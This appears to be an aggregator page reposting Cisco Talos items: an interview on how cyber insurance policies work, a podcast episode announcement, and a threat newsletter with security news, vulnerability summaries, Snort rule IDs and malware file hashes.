                Leslie Lamb was actually one of the first people to even negotiate for a security insurance policy on Cisco’s behalf. Today, the popularity of cyber insurance has exploded as government agencies, small cities, companies and non-profits worry about the rise in ransomware attacks.

                Recent studies suggest having a cyber insurance policy could actually be more attractive to attackers, but companies like to have the policies to cover them if they lose substantial revenue, data or operating time as the result of a cyber attack. Many security experts consider it to be one of the tools that should be considered to mitigate an organization’s risk.

                So what, exactly, goes into these policies? And how have they changed over time? To get a better idea of how cyber insurance works, and what, exactly, it covers, we sat down with Lamb, Cisco’s director of global risk and resiliency management. Below, we have edited our Q&A for brevity and clarity.

                Why do you think cyber insurance has become such a popular trend recently?

                Well, cyber insurance is not actually new. That is a misconception that a lot of people hold.

                It’s been around for at least 10-15 years. It has just recently taken off.

                Over the past five years, it has grown exponentially because of the high profile nature of some cyber incidents. People are aware of what’s going on … no one is immune to having a cyber incident. It’s becoming one of the largest areas for companies to focus on. I’ve been paying attention to cyber for a long time. People thought there’d be major impacts, but there haven’t been……until about 6 or 7 years ago, when we started to see large companies, government entities and even our infrastructure attacked and at risk. Now, people are really starting to look at it.

                How have these policies changed since Y2K, then?

                They’ve changed dramatically over the past five years.

                That whole space has completely blossomed. I would say 6 - 7 years ago … there were a lot of gaps in the coverage.   For example, it was very difficult to find Business Interruption coverage, which would cover costs for loss of revenue. Companies were submitting claims to their insurance carriers and were finding that they were not covered. Insurance companies started to realize there were gaps in coverage, and they started to make these policies much broader and much more meaningful to their customers’ specific risks.

                Most cyber policies have deductibles; both monetary and time bound deductibles or waiting periods. Most people are familiar with monetary deductibles, but may not be familiar with time bound deductibles.  An example of a time bound or waiting period would be when a company has a network outage, they may have to wait for 24 or 48 hours before their coverage would kick in.  The larger the company or exposure, typically the larger the monetary and/or longer the time bound deductibles might be. 

                Are there any aspects of these policies that you feel people wouldn’t normally think about?
                A few examples of coverage that are currently found in the market place and that some people may not know about is coverage for physical damage to hardware or business interruption to help pay for the loss of revenue while the impacted operation is down.

                What are some things that stand out to you when you consider what goes into buying Cisco’s cyber insurance policies?

                I purchased the first cyber insurance policy that Cisco had, and I purchased it ahead of the curve or before many companies were even considering the purchase.

                Generally, we start 120 days out [from when the policy expires]. We essentially do a roadshow for the insurers and present to them what we do as a company. We bring in [Cisco’s CISO] and other internal experts to showcase our mitigation strategies, how we would manage any issue and we discuss our overall governance and internal policies. 

                We also talk about all of the different partnerships across the enterprise that help mitigate the risk.  This is about education and awareness. This isn’t about just IT, it’s about forming internal partnerships to manage the risk. There’s legal, there’s HR, there’s risk management and others all at the table.

                What are some of the things companies can do to help mitigate risk ahead of time to temper the cost of their policies? 

                Making sure their network is safe, providing education and awareness to employees ... having a good business resiliency program in place, doing tabletop exercises to ensure everyone knows their role and everyone knows what to do or not do if they have cyber insurance. Many policies have certain requirements in place, so if you want coverage, you should definitely read the policy ahead of time and know what’s included, what’s not included and what the insurer requires. Many insurers have a panel of experts included in the policy that insured entity can access. People should know about these experts ahead of time and how they might use them.

                We don’t live in a world anymore where it’s just four walls and a router. Everything is interconnected.

                How can insurance policies address that?

                That’s a really complex question, but it depends. … Let’s just say for example [a contract manufacturer], because of the way they put together our gear, causes a cyber problem for one of our customers. We would have a contract that requires the contracted manufacturer to have “network security liability” to cover the costs.

                Our philosophy is … that if Cisco caused it, we’re going to pay for it. Whether we pay for it financially or our insurance policies, it’s our responsibility to pay for it. But if a third party causes it, we need them to pay for it, which is why we get involved in requiring our third party vendors to have certain types of insurance.

                Beers with Talos Ep. #62: Fifty shades of shady

                $
                0
                0


                Beers with Talos (BWT) Podcast episode No. 62 is now available. Download this episode and subscribe to Beers with Talos:

                If iTunes and Google Play aren't your thing, click here.

                Recorded Sept. 13, 2019 

                In one of our "rantier" episodes, the BWT crew dives into the ongoing insidiousness that is cryptomining with Watchbog, and then we turn our attention to some idiot that thinks charging people $50 to bypass MFA on their own machines is a good idea, because nothing bad can happen there, right? RIGHT?! Finally, we take a look at some recent breaches and the trend of attempting to downplay the severity of a breach because the data ex-fil wasn’t “vital or important.” Again, what can go wrong with that line of thinking? This is fine. Everything is just fine. Security is solved, we can go home now.

                The timeline:

                • 01:15 – Roundtable: BWT is infamous, a flying blunderbuss, Mighty Reds, new phones, opening night
                • 15:00 — Pink fluffy ponies dancing on Monero
                • 29:00 — Duo is your friend...bypassing MFA is not
                • 36:00 — Dangers of denying breach severity
                • 49:15 — Parting shots and closing thoughts

                Some other links:

                ==========

                Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
                Hosted by Mitch Neff (@MitchNeff)

                Subscribe via iTunes (and leave a review!)


                Subscribe to the Threat Source newsletter


                Give us your feedback and suggestions for topics: beerswithtalos@cisco.com

                Threat Source newsletter (Sept. 26)

                $
                0
                0

                Newsletter compiled by Jon Munshaw.

                Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

                An attacker known as “Tortoiseshell” is using a phony, malicious website to deliver malware. The site specifically targets U.S. military veterans who may be searching for a job. These types of sites are likely to be shared on social media as the general population hopes to support the veteran population.

                Forget about the iPhone 11, impeachment or nation-state cyber attacks. We all know the biggest news of the past week was Area 51. And thankfully, the latest Beers with Talos talks about storming the secret military base. And some other, more cyber security-focused things.

                We also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.

                Upcoming public engagements with Talos

                Event: “DNS on Fire” at Virus Bulletin 2019
                Location: Novotel London West hotel, London, U.K.
                Date: Oct. 2 - 4
                Speaker: Warren Mercer and Paul Rascagneres
                Synopsis: In this talk, Paul and Warren will walk through two campaigns Talos discovered targeted DNS. The first actor developed a piece of malware, named “DNSpionage,” targeting several government agencies in the Middle East, as well as an airline. During the research process for DNSpionage, we also discovered an effort to redirect DNSs from the targets and discovered some registered SSL certificates for them. The talk will go through the two actors’ tactics, techniques and procedures and the makeup of their targets.

                Event: “It’s never DNS...It was DNS: How adversaries are abusing network blind spots” at SecTor
                Location: Metro Toronto Convention Center, Toronto, Canada
                Date: Oct. 7 - 10
                Speaker: Edmund Brumaghin and Earl Carter
                Synopsis: While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don’t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more.

                Cyber Security Week in Review

                • Apple released iOS 13 to all mobile users over the past week. There’s a series of new privacy and security features with the latest version of the operating system, though some of them are not working as expected. 
                • Dozens of YouTubers had their account credentials stolen and accounts taken over as part of a wave of attacks over the weekend. Attackers used malicious websites to trick the content creators into entering their login information. 
                • Microsoft released an out-of-band patch for Internet Explorer this week for a critical vulnerability. An attacker could exploit this bug to completely take over a user’s machine.  
                • The U.S. is reportedly looking into several options to carry out a cyber attack against Iran. The goal is to disrupt their military operations without escalating kinetic warfare. 
                • U.S. security firm CrowdStrike got wrapped up in the impeachment investigation into President Donald Trump. The company assisted the U.S. Democratic National Committee in researching cyber attacks during the 2016 presidential election, and Trump asked the Ukrainian national government to research CrowdStrike, thinking the company was located there. 
                • Security firm Symantec discovered 25 apps on the Google Play store spreading malware. Together, they had been downloaded about 2.1 million times. 
                • Amazon unveiled its idea for a new wireless protocol called “Sidewalk” that is designed to connect users’ Amazon-created IoT home devices. The company says Wi-Fi and Bluetooth do not extend far enough, and 5G is currently too expensive. 
                • The actors behind the Magecart malware are testing new code that could target public WiFi hotspots. Security researchers say Magecart Group 5 is preparing the code to be injected into benign JavaScript files. 
                • A new report from the U.S. Government Accountability Office says that the U.S. Department of Energy has not done enough to protect the American electrical grid from cyber attacks. The report states actors across the globe can force power outages via cyber attacks, though the breadth of those outages is currently unknown.  

                Notable recent security issues

                Title: New Emotet campaign emerges, but protection stays the same 
                Description: At the beginning of June 2019, Emotet's operators decided to take an extended summer vacation. Even the command and control (C2) activities saw a major pause in activity. However, as summer draws to a close, Cisco Talos and other researchers started to see increased activity in Emotet's C2 infrastructure. And as of Sept. 16, 2019, the Emotet botnet has fully reawakened, and has resumed spamming operations once again. The malware still mainly relies on socially engineered spam emails to spread. Once the attackers have swiped a victim's email, Emotet constructs new attack messages in reply to some of that victim's unread email messages, quoting the bodies of real messages in the threads.
                Snort SIDs: 47616, 47617, 48402, 49889, 43890 – 43892, 44559, 44560

                Title: Aspose PDF API contains multiple remote code execution vulnerabilities
                Description: There are multiple remote code execution vulnerabilities in the Aspose.PDF API. Aspose provides a series of APIs for manipulating or converting a large family of document formats. These vulnerabilities exist in APIs that help process PDFs. An attacker could exploit these vulnerabilities by sending a specially crafted, malicious file to the target and trick them into opening it while using the corresponding API. 
                Snort SIDs: 50730, 50731, 50738, 50739

                Most prevalent malware files this week

                SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510 
                MD5: 4a50780ddb3db16ebab57b0ca42da0fb
                Typical Filename: xme64-2141.exe
                Claimed Product: N/A
                Detection Name: W32.7ACF71AFA8-95.SBX.TG

                SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3
                MD5: 47b97de62ae8b2b927542aa5d7f3c858
                Typical Filename: qmreportupload.exe
                Claimed Product: qmreportupload
                Detection Name: Win.Trojan.Generic::in10.talos

                SHA 256: 15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b 
                MD5: 799b30f47060ca05d80ece53866e01cc
                Typical Filename: mf2016341595.exe
                Claimed Product: N/A
                Detection Name: W32.Generic:Gen.22fz.1201

                SHA 256: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f 
                MD5: e2ea315d9a83e7577053f52c974f6a5a
                Typical Filename: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f.bin
                Claimed Product: N/A
                Detection Name: W32.AgentWDCR:Gen.21gn.1201

                SHA 256: 46b241e3d33811f7364294ea99170b35462b4b5b85f71ac69d75daa487f7cf08
                MD5: db69eaaea4d49703f161c81e6fdd036f
                Typical Filename: xme32-2141-gcc.exe 
                Claimed Product: N/A
                Detection Name: W32.46B241E3D3-95.SBX.TG 
                Viewing all 2037 articles
                Browse latest View live


                <script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>